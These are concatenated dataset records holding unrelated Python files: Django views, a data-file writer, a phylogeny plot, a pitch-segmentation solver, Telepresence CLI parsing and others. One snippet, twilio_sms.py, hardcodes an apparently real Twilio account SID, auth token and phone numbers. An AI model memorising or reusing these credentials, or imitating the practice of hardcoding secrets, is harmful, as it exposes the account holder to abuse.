helper.convert_query_set(response['results'])\n\n return helper.success(response)\n\n except Survey.DoesNotExist as dne:\n return helper.requested_object_not_found('survey id')\n except ValueError as e:\n return helper.invalid_request('At least one of the filters in your request was invalid.')","sub_path":"prolific/surveysAPI/views/surveys.py","file_name":"surveys.py","file_ext":"py","file_size_in_byte":3735,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"372242258","text":"from LogFile import LogFile\nfrom ProgramOption import ProgramOption\n\n\ndef main():\n print(\"Welcome! A Program By Yair Ziv And Shadi Badaria\")\n logData= LogFile(input(\"Please enter the file path:\"))\n if logData.GetLogList():\n while True:\n program=ProgramOption(logData)\n program.print_options()\n program.exe_Function(input(\"\"))\n else:\n print(\"could not open file! 
Exiting....\")\n\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"MainPrg.py","file_name":"MainPrg.py","file_ext":"py","file_size_in_byte":476,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"541314366","text":"from datetime import date\r\nimport datetime\r\n\r\n\r\nclass FedWriter: # Creates and manage writing of files in Federal Reserve common format\r\n\r\n\r\n def __init__(self, measure, location):\r\n # defines list to write\r\n # measureList is name vslue pair for each county\r\n self.measureName = measure\r\n self.measureList = []\r\n self.fileLocation = location\r\n\r\n def print(self):\r\n print(self.fileLocation)\r\n print(self.measureName)\r\n print(self.measureList)\r\n\r\n def leadingzero(self,num):\r\n returnvalue = ''\r\n if num < 10:\r\n returnvalue = '0'+str(num)\r\n else:\r\n returnvalue = str(num)\r\n return returnvalue\r\n\r\n def add(self, indate, inmeasure, incounty):\r\n measuredate = str(indate)\r\n measure = Measure()\r\n measure.setdate(indate)\r\n measure.setvalue(inmeasure)\r\n measure.setcounty(incounty)\r\n self.measureList.append(measure)\r\n\r\n def output_msr_county(self):\r\n amt = len(self.measureList)\r\n if amt>0:\r\n firstline = \"DATE\\t\"+self.measureName+\"\\r\"\r\n location = self.fileLocation+\"\\\\\"+self.measureName+\".txt\"\r\n file = open(location, 'w')\r\n file.write(firstline)\r\n\r\n counter = 0\r\n while counter <= amt-1:\r\n file.write(self.measureList[counter][0]+\"\\t\"+str(self.measureList[counter][1])+\"\\r\")\r\n counter += 1\r\n file.close()\r\n\r\n def output_msr_file(self):\r\n datelist=[]\r\n countylist =[]\r\n #print('Starting Date List:'+str(datetime.datetime.now()))\r\n total=len(self.measureList)\r\n counter=0\r\n for rec in self.measureList:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n if str(rec.date) not in datelist:\r\n datelist.append(str(rec.date))\r\n #print('Ending Date 
List:'+str(datetime.datetime.now()))\r\n #print('Starting County List:'+str(datetime.datetime.now()))\r\n counter=0\r\n for rec in self.measureList:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n if str(rec.county) not in countylist:\r\n countylist.append(str(rec.county))\r\n #print('Ending County List:'+str(datetime.datetime.now()))\r\n #print('# of Dates '+str(len(datelist)))\r\n #print('# of Zips '+str(len(countylist)))\r\n #print('Starting datelist sort:'+str(datetime.datetime.now()))\r\n datelist.sort()\r\n #print('Ending datelist sort:'+str(datetime.datetime.now()))\r\n #print('Starting countylist sort:'+str(datetime.datetime.now()))\r\n countylist.sort()\r\n #print('Ending contylist sort:'+str(datetime.datetime.now()))\r\n firstline = \"COUNTY\"\r\n #print('Ending datelist sort:'+str(datetime.datetime.now()))\r\n #print('Writing Header:' + str(datetime.datetime.now()))\r\n for dateevent in datelist:\r\n firstline = firstline + \"\\t\" + dateevent\r\n\r\n firstline = firstline + \"\\r\"\r\n location = self.fileLocation+\"\\\\\"+self.measureName+\".txt\"\r\n file = open(location, 'w')\r\n file.write(firstline)\r\n #print('Header Done:' + str(datetime.datetime.now()))\r\n total=len(self.measureList)\r\n counter=0\r\n for currcounty in countylist:\r\n counter+=1\r\n perc=round(100*(counter/total),0)\r\n if perc%5==0:\r\n #print(str(perc))\r\n pass\r\n linestr = currcounty\r\n for currdate in datelist:\r\n valuepts = [measure for measure in self.measureList if (measure.county == currcounty and str(measure.date) == str(currdate))]\r\n for valpt in valuepts:\r\n linestr = linestr + \"\\t\" + str(valpt.value)\r\n linestr = linestr + \"\\r\"\r\n file.write(linestr)\r\n file.close()\r\n\r\nclass Measure:\r\n def __init__(self):\r\n self.date = \"\"\r\n self.value = float(0)\r\n self.county = \"\"\r\n\r\n def setdate(self, indate):\r\n self.date = indate\r\n\r\n def setvalue(self, invalue):\r\n self.value = 
float(invalue)\r\n\r\n def setcounty(self,incounty):\r\n self.county = incounty\r\n\r\n","sub_path":"fedwriter.py","file_name":"fedwriter.py","file_ext":"py","file_size_in_byte":4425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"163984953","text":"import random\nfrom ete3 import Tree, NodeStyle, TreeStyle, NCBITaxa, faces\n\nncbi = NCBITaxa()\n\nmy_tree = ncbi.get_topology([54263, 8324, 8323, 8327, 8325, 57571, 323754])\n\nts = TreeStyle()\nts.show_leaf_name = True\n\nfor n in my_tree.traverse():\n nstyle = NodeStyle()\n nstyle[\"fgcolor\"] = \"yellow\"\n nstyle[\"size\"] = 10\n n.set_style(nstyle)\n\nmy_tree.img_style[\"size\"] = 20\nmy_tree.img_style[\"fgcolor\"] = \"green\"\n\ncode_name = {\n \"54263\":\"Ichthyosaura alpestris\",\n \"8324\":\"Lissotriton vulgaris\",\n \"8323\":\"Triturus cristatus\",\n \"8327\":\"Triturus dobrogicus\",\n \"8325\":\"Triturus karelinii \",\n \"57571\":\"Salamandra salamandra \", \n \"323754\":\"Lissotriton montandoni\"\n }\n\ndef mylayout(node):\n\n if node.is_leaf():\n longNameFace = faces.TextFace(code_name[node.name], fsize=15, fgcolor=\"green\")\n faces.add_face_to_node(longNameFace, node, column=0)\n\nts = TreeStyle()\nts.layout_fn = mylayout\nts.scale = 100\nmy_tree.show(tree_style=ts)","sub_path":"names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"174036741","text":"# Download the helper library from https://www.twilio.com/docs/python/install\r\nfrom twilio.rest import Client\r\n\r\n\r\n# Your Account Sid and Auth Token from twilio.com/console\r\n# DANGER! This is insecure. 
See http://twil.io/secure\r\naccount_sid = 'AC0d982082455eff6334adaba25a77d04f'\r\nauth_token = '3b3e2361f7fdb0ac94e4ba9d9fe30d56'\r\nclient = Client(account_sid, auth_token)\r\n\r\nmessage = client.messages.create(\r\n body='This is the ship that made the Kessel Run in fourteen parsecs?',\r\n from_='+17738773065',\r\n to='+918056054049'\r\n )\r\n\r\nprint(message)","sub_path":"twilio_sms.py","file_name":"twilio_sms.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"277041477","text":"from setuptools import setup, find_packages\nfrom os import path\n\nhere = path.abspath(path.dirname(__file__))\n\nsetup(\n name='cpapi',\n version='2.1.0',\n description='Check Point API Web Interface',\n url='https://github.com/themadhatterz/cpapi',\n author='Joshua (Mad) Hatter',\n author_email='jhatter@themadhatter.org',\n classifiers=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6',\n ],\n keywords='CheckPoint Check_Point Check Point API Wrapper',\n packages=find_packages(exclude=['tests', 'dist']),\n install_requires=['flask>=1.0.0,<2.0.0', 'flask_login>=0.4.0,<1.0.0', 'requests>=2.18.0<3.0.0', 'cpapilib>=0.1.8,<1.0.0'],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"489019751","text":"import gamelib\r\nimport random\r\nimport math\r\nimport warnings\r\nfrom sys import maxsize\r\nimport queue\r\nimport pickle\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom network import Network\r\n\r\n\"\"\"\r\nMost of the algo code you write will be in this file unless you create new\r\nmodules yourself. 
Start by modifying the 'on_turn' function.\r\n\r\nAdvanced strategy tips:\r\nAdditional functions are made available by importing the AdvancedGameState\r\nclass from gamelib/advanced.py as a replcement for the regular GameState class\r\nin game.py.\r\n\r\nYou can analyze action frames by modifying algocore.py.\r\n\r\nThe GameState.map object can be manually manipulated to create hypothetical\r\nboard states. Though, we recommended making a copy of the map to preserve\r\nthe actual current map state.\r\n\"\"\"\r\n\r\nclass AlgoStrategy(gamelib.AlgoCore):\r\n def __init__(self):\r\n super().__init__()\r\n random.seed()\r\n file_name = 'network1.pickle'\r\n\r\n def on_game_start(self, config):\r\n \"\"\"\r\n Read in config and perform any initial setup here\r\n \"\"\"\r\n gamelib.debug_write('Configuring your custom algo strategy...')\r\n self.config = config\r\n global FILTER, ENCRYPTOR, DESTRUCTOR, PING, EMP, SCRAMBLER\r\n FILTER = config[\"unitInformation\"][0][\"shorthand\"]\r\n ENCRYPTOR = config[\"unitInformation\"][1][\"shorthand\"]\r\n DESTRUCTOR = config[\"unitInformation\"][2][\"shorthand\"]\r\n PING = config[\"unitInformation\"][3][\"shorthand\"]\r\n EMP = config[\"unitInformation\"][4][\"shorthand\"]\r\n SCRAMBLER = config[\"unitInformation\"][5][\"shorthand\"]\r\n\r\n # Checks if network exist otherwise creates new one\r\n\r\n network = Network()\r\n\r\n network.load_data(\"falseName\")\r\n\r\n\r\n def on_turn(self, turn_state):\r\n \"\"\"\r\n This function is called every turn with the game state wrapper as\r\n an argument. 
The wrapper stores the state of the arena and has methods\r\n for querying its state, allocating your current resources as planned\r\n unit deployments, and transmitting your intended deployments to the\r\n game engine.\r\n \"\"\"\r\n game_state = gamelib.GameState(self.config, turn_state)\r\n gamelib.debug_write('Performing turn {} of your custom algo strategy'.format(game_state.turn_number))\r\n #game_state.suppress_warnings(True) #Uncomment this line to suppress warnings.\r\n\r\n self.starter_strategy(game_state)\r\n\r\n game_state.submit_turn()\r\n\r\n def strategy(self):\r\n possible_game_state = {}\r\n","sub_path":"algo-v1.1/algo_strategy.py","file_name":"algo_strategy.py","file_ext":"py","file_size_in_byte":2537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"440736213","text":"import sys \n\n\nname = sys.argv[1]\nwidth = int(sys.argv[2])\nheight = int(sys.argv[3])\nprint(width)\nprint(height)\nfirst =''\n\nfirst += name;\t\t\t\t\t\t# pierwsza linia\nname_len = len(name)\nfor num in range(0,width-1):\n\tif num % 2 == 0: \n\t\tfirst += name[name_len-2::-1]\n\telse :\n\t\tfirst += name[1::]\nprint (first)\n\n\n\n\ni=1\nwhile(i 0)\n\n def test_dimensions(self):\n # test that the correct midpoint of width is found\n width = self.lamb_sheet.get_width()\n height = self.lamb_sheet.get_height()\n midpoint = self.lamb_sheet.get_midpoint()\n\n self.assertTrue((width == self.REAL_WIDTH),\n (\"Width Found: \" + str(width) + \n \", expected: \" + str(self.REAL_WIDTH)))\n self.assertTrue((height == self.REAL_HEIGHT),\n (\"Height Found: \" + str(height) + \n \", expected: \" + str(self.REAL_HEIGHT)))\n self.assertTrue((midpoint == self.REAL_MIDPOINT),\n (\"Midpoint Found: \" + str(midpoint) + \n \", expected: \" + str(self.REAL_MIDPOINT)))\n\nif __name__ == '__main__':\n 
unittest.main()\n","sub_path":"src/tests/sheet_image_test.py","file_name":"sheet_image_test.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"178910557","text":"import numpy as np\n\nFRAME_SIZE = 0.016\nTHRESHOLD = 15\n\ndef trim_data(pitch_set):\n trimmed_set = []\n new_set = []\n last_zero = True\n for pair in pitch_set:\n if pair[1] > 0:\n new_set.append(pair)\n last_zero = False\n elif last_zero == False:\n trimmed_set.append(new_set)\n new_set = []\n last_zero = True\n return trimmed_set\n\ndef solve(pitch_set):\n data_len = len(pitch_set)\n err_table = []\n\n # init the table O(N)\n first_row = [0 for _ in range(data_len)]\n note = np.array([pitch_set[0][1]])\n for i in range(1,data_len):\n note = np.append(note, pitch_set[i][1])\n first_row[i] = np.sum(np.abs(note - np.median(note)))\n err_table.append(first_row)\n\n predict_note = int(round(data_len * 1))\n \n '''\n print(f'data_len: {data_len}, predict_note: {predict_note}')\n print(\"finish initializing\")\n '''\n \n # fill the table O(NM)\n for note_idx in range(1,predict_note):\n #print(f'index {note_idx}')\n row = [0 for _ in range(data_len)]\n cur_note = np.array([0])\n row[note_idx-1] = 100000 # a large number\n cnt = 1\n for i in range(note_idx+1,data_len):\n temp = np.append(cur_note, pitch_set[i][1])\n can1 = np.sum(np.abs(temp - np.median(temp)))\n can2 = err_table[note_idx-1][i-1]\n if can1 == can2:\n if cnt < 3:\n cur_note = temp\n row[i] = can1 + 0.01\n cnt += 1\n else:\n row[i] = can2\n cnt = 1\n elif can1 < can2:\n if cnt > 8 and abs(can1-can2) < THRESHOLD:\n row[i] = can2\n cnt = 1\n else:\n cur_note = temp\n row[i] = can1\n cnt += 1\n else:\n if cnt < 3 and abs(can1 - can2) < THRESHOLD:\n cur_note = temp\n row[i] = can1\n cnt += 1\n else :\n row[i] = can2\n cnt = 1\n err_table.append(row)\n\n #print(\"backtracking\")\n # backtracking\n ret = []\n\n\n cur_pos = data_len-1\n cur_note = 
predict_note-1\n \n this_note = [0, pitch_set[cur_pos][0]+FRAME_SIZE , 0] # onset offset pitch\n note_pitch = [pitch_set[cur_pos][1]]\n pitch_cnt = 1\n\n # O(N+M)\n while cur_pos > 0 and cur_note > 0:\n if err_table[cur_note][cur_pos] == err_table[cur_note-1][cur_pos-1]:\n this_note[0] = pitch_set[cur_pos][0]-FRAME_SIZE\n this_note[2] = np.median(np.array(note_pitch))\n # print(f'this_note is {this_note}')\n if this_note[2] < 35:\n continue\n ret.append(this_note)\n this_note = [0, pitch_set[cur_pos-1][0]+FRAME_SIZE, 0] # onset offset pitch\n note_pitch = [pitch_set[cur_pos-1][1]]\n cur_pos -= 1\n cur_note -= 1\n pitch_cnt = 1\n else :\n note_pitch.append(pitch_set[cur_pos-1][1])\n pitch_cnt += 1\n cur_pos -= 1\n return ret \n\ndef process(pitch_set):\n res = []\n dat = trim_data(pitch_set)\n '''\n subset_cnt = 0\n '''\n\n for subset in dat:\n '''\n print(f'subset no: {subset_cnt}')\n subset_cnt += 1\n '''\n ans = solve(subset) \n res += ans\n res.sort()\n toRemove = []\n for i in range(1,len(res)):\n if abs(res[i][2] - res[i-1][2]) <= 1 and abs(res[i][0] - res[i-1][1]) < 3*FRAME_SIZE:\n # print(res[i][0], res[i-1][0])\n res[i][0] = res[i-1][0]\n res[i][2] = int(round( (res[i][2] + res[i-1][2])/2 ))\n toRemove += [i-1]\n for idx in toRemove[::-1]:\n res.remove(res[idx])\n return res\n \n","sub_path":"solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":3885,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"651192199","text":"# Copyright 2018 Datawire. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport sys\nimport webbrowser\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom subprocess import check_output\nfrom traceback import format_exc\nfrom typing import Any, Dict, Iterator, List, Optional, Set, Tuple, Union\nfrom urllib.parse import quote_plus\n\nimport telepresence\nfrom telepresence.runner import BackgroundProcessCrash, Runner\nfrom telepresence.utilities import dumb_print, random_name\n\n\nclass PortMapping(object):\n \"\"\"Maps local ports to listen to remote exposed ports.\"\"\"\n def __init__(self) -> None:\n self._mapping = {} # type: Dict[int,int]\n\n @classmethod\n def parse(cls, port_strings: List[str]) -> \"PortMapping\":\n \"\"\"Parse list of 'port' or 'local_port:remote_port' to PortMapping.\"\"\"\n result = PortMapping()\n for port_string in port_strings:\n if \":\" in port_string:\n local_port, remote_port = map(int, port_string.split(\":\"))\n else:\n local_port, remote_port = int(port_string), int(port_string)\n result._mapping[local_port] = remote_port\n return result\n\n def merge_automatic_ports(self, ports: List[int]) -> None:\n \"\"\"\n Merge a list of ports to the existing ones.\n\n The existing ones will win if the port is already there.\n \"\"\"\n remote = self.remote()\n for port in ports:\n if port in remote:\n continue\n self._mapping[port] = port\n\n def remote(self) -> Set[int]:\n \"\"\"Return set of remote 
ports.\"\"\"\n return set(self._mapping.values())\n\n def local_to_remote(self) -> Set[Tuple[int, int]]:\n \"\"\"Return set of pairs of local, remote ports.\"\"\"\n return set(self._mapping.items())\n\n def has_privileged_ports(self) -> bool:\n \"\"\"\n Return true if any remote port is privileged (< 1024)\n \"\"\"\n return any([p < 1024 for p in self.remote()])\n\n\ndef safe_output(args: List[str]) -> str:\n \"\"\"\n Capture output from a command but try to avoid crashing\n :param args: Command to run\n :return: Output from the command\n \"\"\"\n try:\n return str(check_output(args), \"utf-8\").strip().replace(\"\\n\", \" // \")\n except Exception as e:\n return \"(error: {})\".format(e)\n\n\ndef report_crash(error: Any, log_path: str, logs: str) -> None:\n print(\n \"\\nLooks like there's a bug in our code. Sorry about that!\\n\\n\" +\n error + \"\\n\"\n )\n if log_path != \"-\":\n log_ref = \" (see {} for the complete logs):\".format(log_path)\n else:\n log_ref = \"\"\n if \"\\n\" in logs:\n print(\n \"Here are the last few lines of the logfile\" + log_ref + \"\\n\\n\" +\n \"\\n\".join(logs.splitlines()[-12:]) + \"\\n\"\n )\n report = \"no\"\n if sys.stdout.isatty():\n message = (\n \"Would you like to file an issue in our issue tracker?\"\n \" You'll be able to review and edit before anything is\"\n \" posted to the public.\"\n \" We'd really appreciate the help improving our product. 
[Y/n]: \"\n )\n try:\n report = input(message).lower()[:1]\n except EOFError:\n print(\"(EOF)\")\n if report in (\"y\", \"\"):\n url = \"https://github.com/datawire/telepresence/issues/new?body=\"\n body = quote_plus(\n BUG_REPORT_TEMPLATE.format(\n sys.argv,\n telepresence.__version__,\n sys.version,\n safe_output([\"kubectl\", \"version\", \"--short\"]),\n safe_output([\"oc\", \"version\"]),\n safe_output([\"uname\", \"-a\"]),\n error,\n logs[-1000:],\n )[:4000]\n ) # Overly long URLs won't work\n webbrowser.open_new(url + body)\n\n\n@contextmanager\ndef crash_reporting(runner: Optional[Runner] = None) -> Iterator[None]:\n \"\"\"\n Decorator that catches unexpected errors\n \"\"\"\n try:\n yield\n except KeyboardInterrupt:\n if runner is not None:\n show = runner.show\n else:\n show = dumb_print\n show(\"Keyboard interrupt (Ctrl-C/Ctrl-Break) pressed\")\n raise SystemExit(0)\n except Exception as exc:\n if isinstance(exc, BackgroundProcessCrash):\n error = exc.details\n else:\n error = format_exc()\n logs = \"Not available\"\n log_path = \"-\"\n if runner is not None:\n logs = runner.read_logs()\n log_path = runner.logfile_path\n runner.write(\"CRASH: {}\".format(exc))\n runner.write(error)\n runner.write(\"(calling crash reporter...)\")\n report_crash(error, log_path, logs)\n raise SystemExit(1)\n\n\ndef path_or_bool(value: str) -> Union[Path, bool]:\n \"\"\"Parse value as a Path or a boolean\"\"\"\n path = Path(value)\n if path.is_absolute():\n return path\n value = value.lower()\n if value in (\"true\", \"on\", \"yes\", \"1\"):\n return True\n if value in (\"false\", \"off\", \"no\", \"0\"):\n return False\n raise argparse.ArgumentTypeError(\n \"Value must be true, false, or an absolute filesystem path\"\n )\n\n\ndef absolute_path(value: str) -> Path:\n \"\"\"Parse value as a Path or a boolean\"\"\"\n path = Path(value)\n if path.is_absolute():\n return path\n\n raise argparse.ArgumentTypeError(\n \"Value must be an absolute filesystem path\"\n )\n\n\ndef 
parse_args(in_args: Optional[List[str]] = None) -> argparse.Namespace:\n \"\"\"Create a new ArgumentParser and parse sys.argv.\"\"\"\n parser = argparse.ArgumentParser(\n formatter_class=argparse.RawDescriptionHelpFormatter,\n allow_abbrev=False, # can make adding changes not backwards compatible\n description=(\n \"Telepresence: local development proxied to a remote Kubernetes \"\n \"cluster.\\n\\n\"\n \"Documentation: https://telepresence.io\\n\"\n \"Real-time help: https://d6e.co/slack\\n\"\n \"Issue tracker: https://github.com/datawire/telepresence/issues\\n\"\n \"\\n\" + HELP_EXAMPLES + \"\\n\\n\"\n )\n )\n parser.add_argument(\n '--version', action='version', version=telepresence.__version__\n )\n parser.add_argument(\n \"--verbose\",\n action='store_true',\n help=\"Enables verbose logging for troubleshooting.\"\n )\n parser.add_argument(\n \"--logfile\",\n default=\"./telepresence.log\",\n help=(\n \"The path to write logs to. '-' means stdout, \"\n \"default is './telepresence.log'.\"\n )\n )\n parser.add_argument(\n \"--method\",\n \"-m\",\n choices=[\"inject-tcp\", \"vpn-tcp\", \"container\"],\n help=(\n \"'inject-tcp': inject process-specific shared \"\n \"library that proxies TCP to the remote cluster.\\n\"\n \"'vpn-tcp': all local processes can route TCP \"\n \"traffic to the remote cluster. Requires root.\\n\"\n \"'container': used with --docker-run.\\n\"\n \"\\n\"\n \"Default is 'vpn-tcp', or 'container' when --docker-run is used.\\n\"\n \"\\nFor more details see \"\n \"https://telepresence.io/reference/methods.html\"\n )\n )\n parser.add_argument(\n \"--docker-host\",\n dest=\"docker_host\",\n metavar=\"HOSTNAME\",\n help=(\n \"If you are using --method=container within a docker container \"\n \"with a remote docker daemon, you can set a host name or ip \"\n \"address to the host machine's localhost. 
\\n\"\n \"Example '--docker-host docker.for.mac.localhost'\"\n )\n )\n group_deployment = parser.add_mutually_exclusive_group()\n group_deployment.add_argument(\n '--new-deployment',\n \"-n\",\n metavar=\"DEPLOYMENT_NAME\",\n dest=\"new_deployment\",\n help=(\n \"Create a new Deployment in Kubernetes where the \"\n \"datawire/telepresence-k8s image will run. It will be deleted \"\n \"on exit. If no deployment option is specified this will be \"\n \" used by default, with a randomly generated name.\"\n )\n )\n group_deployment.add_argument(\n \"--swap-deployment\",\n \"-s\",\n dest=\"swap_deployment\",\n metavar=\"DEPLOYMENT_NAME[:CONTAINER]\",\n help=(\n \"Swap out an existing deployment with the Telepresence proxy, \"\n \"swap back on exit. If there are multiple containers in the pod \"\n \"then add the optional container name to indicate which container\"\n \" to use.\"\n )\n )\n group_deployment.add_argument(\n \"--deployment\",\n \"-d\",\n metavar=\"EXISTING_DEPLOYMENT_NAME\",\n help=(\n \"The name of an existing Kubernetes Deployment where the \" +\n \"datawire/telepresence-k8s image is already running.\"\n )\n )\n parser.add_argument(\n \"--context\",\n default=None,\n help=(\n \"The Kubernetes context to use. Defaults to current kubectl\"\n \" context.\"\n )\n )\n parser.add_argument(\n \"--namespace\",\n default=None,\n help=(\n \"The Kubernetes namespace to use. Defaults to kubectl's default\"\n \" for the current context, which is usually 'default'.\"\n )\n )\n parser.add_argument(\n \"--serviceaccount\",\n dest=\"service_account\",\n default=None,\n help=(\n \"The Kubernetes service account to use. 
Sets the value for a new\"\n \" deployment or overrides the value for a swapped deployment.\"\n )\n )\n parser.add_argument(\n \"--expose\",\n action='append',\n metavar=\"PORT[:REMOTE_PORT]\",\n default=[],\n help=(\n \"Port number that will be exposed to Kubernetes in the Deployment.\"\n \" Should match port exposed in the existing Deployment if using \"\n \"--deployment or --swap-deployment. By default local port and \"\n \"remote port are the same; if you want to listen on port 8080 \"\n \"locally but be exposed as port 80 in Kubernetes you can do \"\n \"'--expose 8080:80'.\"\n )\n )\n parser.add_argument(\n \"--to-pod\",\n action=\"append\",\n metavar=\"PORT\",\n type=int,\n default=[],\n help=(\n \"Access localhost:PORT on other containers in the swapped \"\n \"deployment's pod from your host or local container. For example, \"\n \"use this to reach proxy/helper containers in the pod with \"\n \"--swap-deployment.\"\n )\n )\n parser.add_argument(\n \"--from-pod\",\n action=\"append\",\n metavar=\"PORT\",\n type=int,\n default=[],\n help=(\n \"Allow access to localhost:PORT on your host or local container \"\n \"from other containers in the swapped deployment's pod. For \"\n \"example, use this to let an adapter container forward requests \"\n \"to your swapped deployment.\"\n )\n )\n parser.add_argument(\n \"--container-to-host\",\n action=\"append\",\n metavar=\"CONTAINER_PORT[:HOST_PORT]\",\n default=[],\n help=(\n \"For the container method, listen on localhost:CONTAINER_PORT in\"\n \" the container and forward connections to localhost:HOST_PORT on\"\n \" the host running Telepresence. 
Useful for allowing code running\"\n \" in the container to connect to an IDE or debugger running on the\"\n \" host.\"\n )\n )\n parser.add_argument(\n \"--also-proxy\",\n metavar=\"CLOUD_HOSTNAME\",\n dest=\"also_proxy\",\n action='append',\n default=[],\n help=(\n \"If you are using --method=vpn-tcp, use this to add additional \"\n \"remote IPs, IP ranges, or hostnames to proxy. Kubernetes service \"\n \"and pods are proxied automatically, so you only need to list \"\n \"cloud resources, e.g. the hostname of a AWS RDS. \"\n \"When using --method=inject-tcp \"\n \"this option is unnecessary as all outgoing communication in \"\n \"the run subprocess will be proxied.\"\n )\n )\n parser.add_argument(\n \"--exclude-proxy\",\n metavar=\"CIDR\",\n dest=\"exclude_proxy\",\n action='append',\n default=[],\n help=(\n \"If you are using --method=vpn-tcp or --method=container, use \"\n \"this to exclude additional remote IPs, and IP ranges to proxy. \"\n \"Kubernetes service and pods are proxied automatically, so you \"\n \"only need to list cloud resources, e.g. the hostname of a AWS \"\n \"RDS. 
When using --method=inject-tcp \"\n \"this option is unnecessary as all outgoing communication in \"\n \"the run subprocess will be proxied.\"\n )\n )\n parser.add_argument(\n \"--host-ip\",\n metavar=\"IPADDRESS\",\n dest=\"host_ip\",\n help=(\n \"If you are using --method=container, with a remote docker daemon \"\n \"(one that is running on the host machine).\"\n )\n )\n parser.add_argument(\n \"--local-cluster\",\n action='store_true',\n help=(\n \"If you are using --method=vpn-tcp with a local cluster (one that\"\n \" is running on the same computer as Telepresence) and you\"\n \" experience DNS loops or loss of Internet connectivity while\"\n \" Telepresence is running, use this flag to enable an internal\"\n \" workaround that may help.\"\n )\n )\n\n mount_group = parser.add_mutually_exclusive_group()\n mount_group.add_argument(\n \"--docker-mount\",\n type=absolute_path,\n metavar=\"PATH\",\n dest=\"docker_mount\",\n default=None,\n help=(\n \"The absolute path for the root directory where volumes will be \"\n \"mounted, $TELEPRESENCE_ROOT. \"\n \"Requires --method container.\"\n )\n )\n\n mount_group.add_argument(\n \"--mount\",\n type=path_or_bool,\n metavar=\"PATH_OR_BOOLEAN\",\n dest=\"mount\",\n default=True,\n help=(\n \"The absolute path for the root directory where volumes will be \"\n \"mounted, $TELEPRESENCE_ROOT. \"\n \"Use \\\"true\\\" to have Telepresence pick a random mount point \"\n \"under /tmp (default). \"\n \"Use \\\"false\\\" to disable filesystem mounting entirely.\"\n )\n )\n\n parser.add_argument(\n \"--env-json\",\n metavar=\"FILENAME\",\n default=None,\n help=\"Also emit the remote environment to a file as a JSON blob.\"\n )\n\n parser.add_argument(\n \"--env-file\",\n metavar=\"FILENAME\",\n default=None,\n help=(\n \"Also emit the remote environment to an env file in Docker \"\n \"Compose format. 
\"\n \"See https://docs.docker.com/compose/env-file/ for more \"\n \"information on the limitations of this format.\"\n )\n )\n\n group = parser.add_mutually_exclusive_group()\n group.add_argument(\n \"--run-shell\",\n dest=\"runshell\",\n action=\"store_true\",\n help=\"Run a local shell that will be proxied to/from Kubernetes.\",\n )\n group.add_argument(\n \"--run\",\n metavar=(\"COMMAND\", \"ARG\"),\n dest=\"run\",\n nargs=argparse.REMAINDER,\n help=(\n \"Run the specified command arguments, e.g. \"\n \"'--run python myapp.py'.\"\n )\n )\n group.add_argument(\n \"--docker-run\",\n metavar=\"DOCKER_RUN_ARG\",\n dest=\"docker_run\",\n nargs=argparse.REMAINDER,\n help=(\n \"Run a Docker container, by passing the arguments to 'docker run',\"\n \" e.g. '--docker-run -i -t ubuntu:16.04 /bin/bash'. \"\n \"Requires --method container.\"\n )\n )\n args = parser.parse_args(in_args)\n\n # Fill in defaults:\n if args.method is None:\n if args.docker_run is not None:\n args.method = \"container\"\n else:\n args.method = \"vpn-tcp\"\n\n if args.deployment is not None:\n args.operation = \"deployment\"\n args.deployment_arg = args.deployment\n elif args.swap_deployment is not None:\n args.operation = \"swap_deployment\"\n args.deployment_arg = args.swap_deployment\n elif args.new_deployment is not None:\n args.operation = \"new_deployment\"\n args.deployment_arg = args.new_deployment\n else:\n args.operation = \"new_deployment\"\n args.new_deployment = random_name()\n args.deployment_arg = args.new_deployment\n\n if args.docker_mount:\n args.mount = False\n\n if args.method == \"container\" and args.docker_run is None:\n raise SystemExit(\n \"'--docker-run' is required when using '--method container'.\"\n )\n if args.docker_run is not None and args.method != \"container\":\n raise SystemExit(\n \"'--method container' is required when using '--docker-run'.\"\n )\n\n if args.docker_mount is not None and args.method != \"container\":\n raise SystemExit(\n \"'--method container' 
